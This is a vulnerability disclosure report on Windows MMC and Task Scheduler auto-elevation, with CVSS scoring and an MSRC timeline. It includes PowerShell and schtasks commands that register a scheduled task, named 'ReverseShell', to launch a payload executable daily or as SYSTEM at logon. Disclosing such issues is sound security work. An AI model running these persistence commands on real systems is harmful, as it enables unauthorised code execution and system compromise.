Microsoft Windows Task Scheduler local EoP Report by Social Engineering Neo.


Affected Platforms: -
Microsoft Windows ≤10


Tested On: -
Windows 10 (build 1809, 1903) & Windows 7 SP1.
Tested on the most recent security patch. (July 2019)


Class: -
Improper Authorization - (CWE-285).
Remote Code Execution.


Summary: - The Typical Computer User Can Trigger Programs at Intervals on any Account existing on the Host System/Domain without Propper Authorization.


Short Description: - The Windows MMC auto-elevates members of the 'administrators' group via the GUI, MMC snap-ins (via mmc.exe) automatically elevate without prompting UAC potentially leading to unintentional EoP.


Long Description: - The built-in Windows component 'Microsoft Management Console' is potentially affected by improper authorization. MMC snap-ins (.msc) auto-elevate users existing in the 'administrators' group including administrator accounts.
                : - Only the GUI seems to be affected, this is shown with our simple PowerShell script when you adjust '-Daily -At 9pm' to '-AtLogOn' or '-AtStartUp' additional permissions are required.
                : - Whereas the GUI allows "-AtLogOn" without additional permissions.
                : - An attacker with the ability to execute 'taskschd.msc' with arguments through the CLI is able to perform this attack with elevated permissions as a payload, therefore exploitability is greatly increased.
                : - HIDS/HIPS without specific configurations may not detect such events as alerts or warnings and simply log the event instead, increasing the chances of a system administrator looking past the issue.
                : - Enterprise/Personal systems complying with basic security practices are less likely to be affected, the average computer user with default system configuration could be vulnerable to such attacks.


Proof of Concept: - (PowerShell)
#Windows ≤7
Import-Module PSScheduledJob
$trigger = New-JobTrigger -Daily -At 9pm
Register-ScheduledJob -Name "ReverseShell" -FilePath 'C:\Users\seneo\Documents\payload-x64.exe' -Description "This Task Will Run the Reverse Shell." -Trigger $trigger

#Windows ≥8
Import-Module ScheduledTasks
$action = New-ScheduledTaskAction -Execute 'C:\Users\seneo\Documents\payload-x64.exe'
$trigger = New-ScheduledTaskTrigger -Daily -At 9pm
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "ReverseShell" -Description "This Task Will Run the Reverse Shell."

#The above PowerShell script will create a task titled "ReverseShell" with the description "This Task Will Run the Reverse Shell."
#Some additional configuration of the PowerShell may be required.
#We have our own reverse shell payload, its up to you "the attacker" to create your own payload.
#
#NOTE: Task should run everyday at 9pm (system time). You can change this to what suits your needs.
#      Task will only have 'user' permissions, this PoC only exists to prove modifying line 9, col 39 & line 3, col 28 to either "AtLogIn" or "AtStartUp" will result in access denied.
#      The GUI is automatically elevated, whereas the CLI is not.
#   ***We have later noticed this PoC is essentially the same as running `schtasks.exe /Create /SC ONLOGON /TN ReverseShell /TR C:\Users\seneo\Documents\payload-x64.exe /RU "NT AUTHORITY\SYSTEM"` *additional permissions needed for CLI, not GUI*


VIDEO: - https://youtu.be/z2C-IykCfbk **updated**
     : - https://youtu.be/_leFNyo5wxM **original**


Expected Result: -
Normal users should not be able to run tasks as other user and execute programs on accounts without proper authorization.


Observed Result: -
Task runs with 'SYSTEM' privileges on all users upon trigger with no authentication, leading to total system compromisation.


Our Recommendation: -
System Administrators should follow basic security practices to prevent enterprise/client systems being affected with this issue.
Microsoft should prevent the Microsoft Management Console (MMC) snap-ins from auto-elevating without UAC authorization.
The average user should be informed about attacks like this because most "average" users will not understand how they can be affected by attacks such as this.
Proper access control implementations will greatly reduce risk towards enterprise systems.


NVD CVSS v3 Vector: -
AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H/E:P/RL:W/RC:R/CR:L/IR:L/AR:L/MAV:L/MAC:L/MPR:L/MUI:R/MS:C/MC:H/MI:H/MA:H

CVSS Base Score: - 8.2
Impact Sub score: - 6.0
Exploitability Sub score: - 1.5
CVSS Temporal Score: - 7.2
CVSS Environmental Score: - 5.7
Modified Impact Sub score: - 4.5
Overall CVSS Score: - 5.7


NVD CVSS v2 Vector: -
(AV:L/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:W/RC:UR/CDP:MH/TD:M/CR:L/IR:L/AR:L)

CVSS Base Score: - 6.8
Impact Sub score: - 10.0
Exploitability Sub score: - 3.1
CVSS Temporal Score: - 5.5
CVSS Environmental Score: - 4.8
Modified Impact Sub score: - 7.3
Overall CVSS Score: - 4.8


MITRE CVSS Vector: -
Base Vector: - AV:L/AC:L/Au:S/C:C/I:C/A:C
Base Score: - 6.8


TIMELINE: - Discovery         5th July 2019
        : - Initial Report    5th July 2019
        : - Case Opened       8th July 2019
        : - Added Detail      8th July 2019    *Public Disclosure Date: - 30th July 2019 (25 days from initial discovery)
        : - MSRC Response     9th July 2019
        : - Our Response      9th July 2019
        : - Case Closed       9th July 2019
        : - MSRC Response     9th July 2019
        : - Our Response      9th July 2019    *Public Disclosure Date: - 10th July 2019 (24 hours from closed case)   
        
        : - We thank the MSRC team for their quick response.